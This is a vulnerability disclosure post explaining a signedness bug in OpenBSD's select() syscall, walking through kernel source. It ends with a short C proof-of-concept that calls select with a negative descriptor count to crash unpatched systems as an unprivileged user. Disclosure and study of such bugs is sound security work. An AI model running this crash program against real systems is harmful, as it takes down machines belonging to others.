Hi there,

Recently a bug in the select() syscall of openbsd was published.
This text describes the details and the eventual exploitation of this bug.

First of all let us look at the definition of select():

     int select(int nfds, fd_set *readfds, fd_set *writefds, 
                fd_set *exceptfds, struct timeval *timeout);

The first argument is the number of the file descriptors, followed by
the three sets of descriptors (read,write,except) plus a timeout before
returning, which is optional (NULL equals no timeout).

The implementation of sys_select() takes place in kern/sys_generic.c.
Let's go through the code, step by step:

  ..
        register struct sys_select_args /* {
                syscallarg(int) nd;
                syscallarg(fd_set *) in;
                syscallarg(fd_set *) ou;
                syscallarg(fd_set *) ex;
                syscallarg(struct timeval *) tv;
        } */ *uap = v;
        fd_set bits[6], *pibits[3], *pobits[3];
  ..
        int s, ncoll, error = 0, timo;
        u_int ni;
  ..
(1)     if (SCARG(uap, nd) > p->p_fd->fd_nfiles) {
                /* forgiving; slightly wrong */
                SCARG(uap, nd) = p->p_fd->fd_nfiles;
        }
(2)  ni = howmany(SCARG(uap, nd), NFDBITS) * sizeof(fd_mask);
  ..
(3)  #define getbits(name, x) \
          if (SCARG(uap, name) && (error = copyin((caddr_t)SCARG(uap, name), \
              (caddr_t)pibits[x], ni))) \
                  goto done;
(4)     getbits(in, 0);
        getbits(ou, 1);
        getbits(ex, 2);
        #undef  getbits
  ..

SCARG is a macro to access arg2 from structure arg1. At (1) an upperbound check
is done to adjust 'nd' (arg1 of select) in case it is bigger than the number of
open files that are allocated. There we spot the first problem. Both values
of the comparison are signed integers and it only checks for an upperbound limit. 
What happens if you enter a negative value ? We will see.

At (2) it stores in 'ni' (which is defined as u_int) how many bytes are 
needed to copy from the descriptor sets to the local pibits fd_set. If we assume 
that 'nd' is a negative value then something special happens. Let's zoom in:
(from sys/types.h)

  #define NBBY    8
  typedef int32_t fd_mask;
  #define NFDBITS (sizeof(fd_mask) * NBBY)
  #define howmany(x, y)   (((x) + ((y) - 1)) / (y))

On an i386 machine int32_t is 4 bytes, thus NFDBITS equals 32. 
If x is smaller than -31 howmany results in a negative value, thus 'ni' swaps to 
a very big unsigned number. e.g. 536870908. 
This behaviour has a catastrophic impact then the macro (3) getbits does a (4) copyin
(which is infact something like bcopy) from in,ou,ex to pibits[] with the length
of ni! 
What does that mean? You can overwrite kernel memory by providing a negative nd and 
with pointers to arbitrary data as arg2,3,4 of the select syscall, since the length
'ni' is pretty messed up.
Like that it's very trivial to crash the system as unpriviledged user. It might even 
be possible to compromise the system with specially crafted pointers...

What follows is a very small program which immediately crashes any unpatched OpenBSD 
system (tested 2.6-3.1) as unpriviledged user:

cat > obsdfault.c << EOF
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>

int main() {
int r;
char *la = "VBASAAAAAAAAAAAAAAA";

r = select(-19999, la, NULL, NULL, NULL);
exit(0);
}
EOF

ugh. yes, it's that easy. Now, select is a very vital syscall and it is/was buggy.
Imagine, there are 182 other syscalls .... ;-).

Have fun,
your drugphish.ch security team
sec@drugphish.ch